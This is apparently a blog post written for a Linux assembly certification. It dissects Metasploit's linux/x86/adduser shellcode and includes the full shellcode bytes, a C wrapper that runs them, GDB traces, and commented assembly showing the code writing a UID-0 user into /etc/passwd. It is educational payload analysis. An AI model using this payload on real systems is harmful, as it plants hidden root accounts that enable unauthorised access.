The next assignment for the SLAE is analyzing three different Metasploit linux x86 payloads. For the first one we’ll be going through the linux/x86/adduser payload and seeing exactly how it works.

Let’s first dive in by checking the payload options.

root@kali:~# msfvenom -p linux/x86/adduser --payload-options
Options for payload/linux/x86/adduser:


       Name: Linux Add User
     Module: payload/linux/x86/adduser
   Platform: Linux
       Arch: x86
Needs Admin: Yes
 Total size: 97
       Rank: Normal

Provided by:
    skape <mmiller@hick.org>
    vlad902 <vlad902@gmail.com>
    spoonm <spoonm@no$email.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
PASS   metasploit       yes       The password for this user
SHELL  /bin/sh          no        The shell for this user
USER   metasploit       yes       The username to create

Description:
  Create a new user with UID 0
~
~

We can see there are two required options, USER and PASS. Let’s run msfvenom with our custom parameters and pipe the payload into ndisasm to check out the assembly.

root@kali:~# msfvenom -p linux/x86/adduser USER=absolomb PASS=supersecret -f raw | ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 95 bytes

00000000  31C9              xor ecx,ecx
00000002  89CB              mov ebx,ecx
00000004  6A46              push byte +0x46
00000006  58                pop eax
00000007  CD80              int 0x80
00000009  6A05              push byte +0x5
0000000B  58                pop eax
0000000C  31C9              xor ecx,ecx
0000000E  51                push ecx
0000000F  6873737764        push dword 0x64777373
00000014  682F2F7061        push dword 0x61702f2f
00000019  682F657463        push dword 0x6374652f
0000001E  89E3              mov ebx,esp
00000020  41                inc ecx
00000021  B504              mov ch,0x4
00000023  CD80              int 0x80
00000025  93                xchg eax,ebx
00000026  E826000000        call 0x51
0000002B  61                popa
0000002C  62736F            bound esi,[ebx+0x6f]
0000002F  6C                insb
00000030  6F                outsd
00000031  6D                insd
00000032  623A              bound edi,[edx]
00000034  41                inc ecx
00000035  7A33              jpe 0x6a
00000037  672E7A62          cs jpe 0x9d
0000003B  7139              jno 0x76
0000003D  637237            arpl [edx+0x37],si
00000040  633A              arpl [edx],di
00000042  303A              xor [edx],bh
00000044  303A              xor [edx],bh
00000046  3A2F              cmp ch,[edi]
00000048  3A2F              cmp ch,[edi]
0000004A  62696E            bound ebp,[ecx+0x6e]
0000004D  2F                das
0000004E  7368              jnc 0xb8
00000050  0A598B            or bl,[ecx-0x75]
00000053  51                push ecx
00000054  FC                cld
00000055  6A04              push byte +0x4
00000057  58                pop eax
00000058  CD80              int 0x80
0000005A  6A01              push byte +0x1
0000005C  58                pop eax
0000005D  CD80              int 0x80

Everything looks pretty straight forward until we see a lot of weird instructions starting around 0000002B. We can see a total of four interrupts being called. To help analyze further let’s put this through GDB. To do this we’ll first extract our shellcode and place in a simple C wrapper.

root@kali:~# msfvenom -p linux/x86/adduser USER=absolomb PASS=supersecret -f c
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] = 
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x26\x00\x00\x00\x61\x62"
"\x73\x6f\x6c\x6f\x6d\x62\x3a\x41\x7a\x33\x67\x2e\x7a\x62\x71"
"\x39\x63\x72\x37\x63\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62"
"\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80"
"\x6a\x01\x58\xcd\x80";
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x26\x00\x00\x00\x61\x62"
"\x73\x6f\x6c\x6f\x6d\x62\x3a\x41\x7a\x33\x67\x2e\x7a\x62\x71"
"\x39\x63\x72\x37\x63\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62"
"\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80"
"\x6a\x01\x58\xcd\x80";
main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

Now we can compile.

root@kali:~/SLAE# gcc shellcode.c -o shellcode -fno-stack-protector -z execstack

Let’s test to make sure our shellcode actually works as intended.

root@kali:~/SLAE# ./shellcode 
Shellcode Length:  40
root@kali:~/SLAE# cat /etc/passwd | grep absolomb
absolomb:Az3g.zbq9cr7c:0:0::/:/bin/sh

And we can see that our new user has indeed been added to /etc/passwd.

Let’s fire up GDB. Along with it we’ll also be using PEDA to make things even easier.

We’ll first set a breakpoint at code which is the start of our shellcode.

root@kali:~/SLAE# gdb -q ./shellcode
gdb-peda$ break *&code
Breakpoint 1 at 0x2040
gdb-peda$ r
Starting program: /root/SLAE/shellcode 
Shellcode Length:  40

[----------------------------------registers-----------------------------------]
EAX: 0x402040 --> 0xcb89c931 
EBX: 0x402000 --> 0x1efc 
ECX: 0x16 
EDX: 0xb7fa4870 --> 0x0 
ESI: 0x1 
EDI: 0xb7fa3000 --> 0x1b9db0 
EBP: 0xbffff388 --> 0x0 
ESP: 0xbffff36c --> 0x40059d (<main+80>:	mov    eax,0x0)
EIP: 0x402040 --> 0xcb89c931
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40203a:	add    BYTE PTR [eax],al
   0x40203c:	add    BYTE PTR [eax],al
   0x40203e:	add    BYTE PTR [eax],al
=> 0x402040 <code>:	xor    ecx,ecx
   0x402042 <code+2>:	mov    ebx,ecx
   0x402044 <code+4>:	push   0x46
   0x402046 <code+6>:	pop    eax
   0x402047 <code+7>:	int    0x80
[------------------------------------stack-------------------------------------]
0000| 0xbffff36c --> 0x40059d (<main+80>:	mov    eax,0x0)
0004| 0xbffff370 --> 0x1 
0008| 0xbffff374 --> 0xbffff434 --> 0xbffff5c1 ("/root/SLAE/shellcode")
0012| 0xbffff378 --> 0xbffff43c --> 0xbffff5d6 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
0016| 0xbffff37c --> 0x402040 --> 0xcb89c931 
0020| 0xbffff380 --> 0xbffff3a0 --> 0x1 
0024| 0xbffff384 --> 0x0 
0028| 0xbffff388 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Let’s disassemble.

Breakpoint 1, 0x00402040 in code ()
gdb-peda$ disas
Dump of assembler code for function code:
=> 0x00402040 <+0>:	xor    ecx,ecx
   0x00402042 <+2>:	mov    ebx,ecx
   0x00402044 <+4>:	push   0x46
   0x00402046 <+6>:	pop    eax
   0x00402047 <+7>:	int    0x80
   0x00402049 <+9>:	push   0x5
   0x0040204b <+11>:	pop    eax
   0x0040204c <+12>:	xor    ecx,ecx
   0x0040204e <+14>:	push   ecx
   0x0040204f <+15>:	push   0x64777373
   0x00402054 <+20>:	push   0x61702f2f
   0x00402059 <+25>:	push   0x6374652f
   0x0040205e <+30>:	mov    ebx,esp
   0x00402060 <+32>:	inc    ecx
   0x00402061 <+33>:	mov    ch,0x4
   0x00402063 <+35>:	int    0x80
   0x00402065 <+37>:	xchg   ebx,eax
   0x00402066 <+38>:	call   0x402091 <code+81>
   0x0040206b <+43>:	popa   
   0x0040206c <+44>:	bound  esi,QWORD PTR [ebx+0x6f]
   0x0040206f <+47>:	ins    BYTE PTR es:[edi],dx
   0x00402070 <+48>:	outs   dx,DWORD PTR ds:[esi]
   0x00402071 <+49>:	ins    DWORD PTR es:[edi],dx
   0x00402072 <+50>:	bound  edi,QWORD PTR [edx]
   0x00402074 <+52>:	inc    ecx
   0x00402075 <+53>:	jp     0x4020aa
   0x00402077 <+55>:	addr16 cs jp 0x4020dd
   0x0040207b <+59>:	jno    0x4020b6
   0x0040207d <+61>:	arpl   WORD PTR [edx+0x37],si
   0x00402080 <+64>:	arpl   WORD PTR [edx],di
   0x00402082 <+66>:	xor    BYTE PTR [edx],bh
   0x00402084 <+68>:	xor    BYTE PTR [edx],bh
   0x00402086 <+70>:	cmp    ch,BYTE PTR [edi]
   0x00402088 <+72>:	cmp    ch,BYTE PTR [edi]
   0x0040208a <+74>:	bound  ebp,QWORD PTR [ecx+0x6e]
   0x0040208d <+77>:	das    
   0x0040208e <+78>:	jae    0x4020f8
   0x00402090 <+80>:	or     bl,BYTE PTR [ecx-0x75]
   0x00402093 <+83>:	push   ecx
   0x00402094 <+84>:	cld    
   0x00402095 <+85>:	push   0x4
   0x00402097 <+87>:	pop    eax
   0x00402098 <+88>:	int    0x80
   0x0040209a <+90>:	push   0x1
   0x0040209c <+92>:	pop    eax
   0x0040209d <+93>:	int    0x80
   0x0040209f <+95>:	add    BYTE PTR [eax],al
End of assembler dump.

We can see we have the same output from disassembling as we got from ndisasm. Let’s take a look at the setup right before our first interrupt is called at address 0x00402047.

setreuid()

Let’s take a look at the assembly which setups our first interrupt:

xor    ecx,ecx
mov    ebx,ecx
push   0x46
pop    eax
int    0x80
push   0x5

Looking in GDB we can break right before the interrupt is executed.

[----------------------------------registers-----------------------------------]
EAX: 0x46 ('F')
EBX: 0x0 
ECX: 0x0 
EDX: 0xb7fa4870 --> 0x0 
ESI: 0x1 
EDI: 0xb7fa3000 --> 0x1b9db0 
EBP: 0xbffff388 --> 0x0 
ESP: 0xbffff36c --> 0x40059d (<main+80>:	mov    eax,0x0)
EIP: 0x402047 --> 0x56a80cd
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x402042 <code+2>:	mov    ebx,ecx
   0x402044 <code+4>:	push   0x46
   0x402046 <code+6>:	pop    eax
=> 0x402047 <code+7>:	int    0x80
   0x402049 <code+9>:	push   0x5
   0x40204b <code+11>:	pop    eax
   0x40204c <code+12>:	xor    ecx,ecx
   0x40204e <code+14>:	push   ecx

So we can see that EAX is setup with syscall 0x46 which translates to 70 in decimal format, along with EBX and ECX both containing 0’s.

We can check our syscall at /usr/include/i386-linux-gnu/asm/unistd_32.h which is defined as setreuid(). According to the man pages this sets real and effective user IDs of the calling process.

The format for that is setreuid(uid_t ruid, uid_t euid); which means the call here looks like this:

setreuid(0, 0)

Which means this is setting root permissions for both real and effective user ID.

open()

Our next chunk of assembly looks like such:

push   0x5			
pop    eax			
xor    ecx,ecx			
push   ecx			
push   0x64777373		
push   0x61702f2f		
push   0x6374652f	
mov    ebx,esp		
inc    ecx	
mov    ch,0x4		
int    0x80	

Let’s check out the registers right before the interrupt is called.

[----------------------------------registers-----------------------------------]
EAX: 0x5 
EBX: 0xbffff35c ("/etc//passwd")
ECX: 0x401 
EDX: 0xb7fa4870 --> 0x0 
ESI: 0x1 
EDI: 0xb7fa3000 --> 0x1b9db0 
EBP: 0xbffff388 --> 0x0 
ESP: 0xbffff35c ("/etc//passwd")
EIP: 0x402063 --> 0xe89380cd
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40205e <code+30>:	mov    ebx,esp
   0x402060 <code+32>:	inc    ecx
   0x402061 <code+33>:	mov    ch,0x4
=> 0x402063 <code+35>:	int    0x80
   0x402065 <code+37>:	xchg   ebx,eax
   0x402066 <code+38>:	call   0x402091 <code+81>
   0x40206b <code+43>:	popa   
   0x40206c <code+44>:	bound  esi,QWORD PTR [ebx+0x6f]

EAX is populated with a 5 which is defined as open() in /usr/include/i386-linux-gnu/asm/unistd_32.h

We can see EBX is pointing to an memory address on the stack which contains /etc//passwd. The extra / is in there to make the string even for hexadecimal. This was setup by the three push calls:

push   0x64777373		; "dwss"
push   0x61702f2f		; "ap//"
push   0x6374652f		; "cte/"

We can also see ECX has a value of 0x401 which sets our flags to O_WRONLY|O_APPEND, meaning write and read with append. So our final syscall here looks like such:

open("/etc//passwd", O_WRONLY|O_APPEND)

write()

Next chunk of assembly:

xchg   ebx,eax			
call   0x402091 <code+81>	
popa   			
bound  esi,QWORD PTR [ebx+0x6f]
ins    BYTE PTR es:[edi],dx
outs   dx,DWORD PTR ds:[esi]
ins    DWORD PTR es:[edi],dx
bound  edi,QWORD PTR [edx]
inc    ecx
jp     0x4020aa
addr16 cs jp 0x4020dd
jno    0x4020b6
arpl   WORD PTR [edx+0x37],si
arpl   WORD PTR [edx],di
xor    BYTE PTR [edx],bh
xor    BYTE PTR [edx],bh
cmp    ch,BYTE PTR [edi]
cmp    ch,BYTE PTR [edi]
bound  ebp,QWORD PTR [ecx+0x6e]
das    
jae    0x4020f8
or     bl,BYTE PTR [ecx-0x75]	
push   ecx		     	
cld			      
push   0x4		     	
pop    eax	
int    0x80	

The first thing that happens in this section is the return value from the open() syscall (stored in EAX) is preserved by doing an XCHG with EBX. Since EAX will get used for the next syscall, the file descriptor must be stored elsewhere.

Right after that we see a CALL to a memory address further down or to code+81. The CALL here will push the next set of instructions to the stack. Looking at the instructions past it just looks like a bunch of garbage instructions, however if we examine the addresses in memory we see that this is actually the string to be written to our open file.

Let’s set a breakpoint at 0x402091.

[----------------------------------registers-----------------------------------]
EAX: 0xbffff35c ("/etc//passwd")
EBX: 0x3 
ECX: 0x401 
EDX: 0xb7fa4870 --> 0x0 
ESI: 0x1 
EDI: 0xb7fa3000 --> 0x1b9db0 
EBP: 0xbffff388 --> 0x0 
ESP: 0xbffff358 --> 0x40206b ("absolomb:Az3g.zbq9cr7c:0:0::/:/bin/sh\nY\213Q\374j\004X̀j\001X̀")
EIP: 0x402091 --> 0xfc518b59
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x402091 <code+81>:	pop    ecx
   0x402092 <code+82>:	mov    edx,DWORD PTR [ecx-0x4]
   0x402095 <code+85>:	push   0x4
   0x402097 <code+87>:	pop    eax
[------------------------------------stack-------------------------------------]
0000| 0xbffff358 --> 0x40206b ("absolomb:Az3g.zbq9cr7c:0:0::/:/bin/sh\nY\213Q\374j\004X̀j\001X̀")

As you can see on the stack is indeed the string to be written to /etc/passwd.

What’s more interesting here is that looking at GDB PEDA, we can see the next instruction is a POP to ECX as well as a MOV into EDX. This POP will push our string into ECX. However just doing a regular disassemble we cannot see this instruction and it also does not show in ndisasm. I believe this is due to the length of our string and it’s associated instructions not realigning up nicely for disassembly.

Let’s continue and break just before our next interrupt is called.

[----------------------------------registers-----------------------------------]
EAX: 0x4 
EBX: 0x3 
ECX: 0x40206b ("absolomb:Az3g.zbq9cr7c:0:0::/:/bin/sh\nY\213Q\374j\004X̀j\001X̀")
EDX: 0x26 ('&')
ESI: 0x1 
EDI: 0xb7fa3000 --> 0x1b9db0 
EBP: 0xbffff388 --> 0x0 
ESP: 0xbffff35c ("/etc//passwd")
EIP: 0x402098 --> 0x16a80cd
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x402094 <code+84>:	cld    
   0x402095 <code+85>:	push   0x4
   0x402097 <code+87>:	pop    eax
=> 0x402098 <code+88>:	int    0x80
   0x40209a <code+90>:	push   0x1
   0x40209c <code+92>:	pop    eax
   0x40209d <code+93>:	int    0x80
   0x40209f <code+95>:	add    BYTE PTR [eax],al

Here we can see EAX is populated with a 4 which is the write() syscall. Our open file descriptor is still in EBX from earlier. Our string to write is in ECX, along with its length (38) in EDX.

Essentially our syscall looks like this:

write(3, "absolomb:Az3g.zbq9cr7c:0:0::/:/bin/sh" , 38)

exit()

Our last section is fairly short and simple.

push   0x1
pop    eax	
int    0x80	
[----------------------------------registers-----------------------------------]
EAX: 0x1 
EBX: 0x3 
ECX: 0x40206b ("absolomb:Az3g.zbq9cr7c:0:0::/:/bin/sh\nY\213Q\374j\004X̀j\001X̀")
EDX: 0x26 ('&')
ESI: 0x1 
EDI: 0xb7fa3000 --> 0x1b9db0 
EBP: 0xbffff388 --> 0x0 
ESP: 0xbffff35c ("/etc//passwd")
EIP: 0x40209d --> 0x80cd
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x402098 <code+88>:	int    0x80
   0x40209a <code+90>:	push   0x1
   0x40209c <code+92>:	pop    eax
=> 0x40209d <code+93>:	int    0x80
   0x40209f <code+95>:	add    BYTE PTR [eax],al
   0x4020a1:	add    BYTE PTR [eax],al
   0x4020a3:	add    BYTE PTR [eax],al
   0x4020a5:	add    BYTE PTR [eax],al

This last part is simply exiting the program, pushing the exit syscall (1) to the stack and popping it, then calling exit. The exit number stored in EBX really doesn’t matter here so whatever is left from EBX is the code returned, which is a 3.

exit(3)

Final Commented Assembly

xor    ecx,ecx			; set ecx to zero
mov    ebx,ecx			; move zero into ebx
push   0x46			; syscall setreuid
pop    eax			; move setreuid into eax
int    0x80			; execute setreuid
push   0x5			; syscall open 
pop    eax			; 
xor    ecx,ecx			; clear ecx to 0
push   ecx			; 0 to stack
push   0x64777373		; "dwss"
push   0x61702f2f		; "ap//"
push   0x6374652f		; "cte/"
mov    ebx,esp			; point to stack
inc    ecx			; 
mov    ch,0x4			; O_WRONLY|O_APPEND
int    0x80			; execute open
xchg   ebx,eax			; store open file in ebx
call   0x402091 <code+81>	; call address 0x402091 which will push the string to the stack
popa   				; start of string to be written to file
bound  esi,QWORD PTR [ebx+0x6f]
ins    BYTE PTR es:[edi],dx
outs   dx,DWORD PTR ds:[esi]
ins    DWORD PTR es:[edi],dx
bound  edi,QWORD PTR [edx]
inc    ecx
jp     0x4020aa
addr16 cs jp 0x4020dd
jno    0x4020b6
arpl   WORD PTR [edx+0x37],si
arpl   WORD PTR [edx],di
xor    BYTE PTR [edx],bh
xor    BYTE PTR [edx],bh
cmp    ch,BYTE PTR [edi]
cmp    ch,BYTE PTR [edi]
bound  ebp,QWORD PTR [ecx+0x6e]
das    
jae    0x4020f8
or     bl,BYTE PTR [ecx-0x75]	; end of string to be written
push   ecx		     	; not really a push here, pop ecx starts shortly before followed by a mov
cld			        ; not really a cld here
push   0x4		     	; write() 
pop    eax			; 
int    0x80			; execute write()
push   0x1			; exit()
pop    eax			;
int    0x80			; execute exit()

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1208

Github Repo: https://github.com/absolomb/SLAE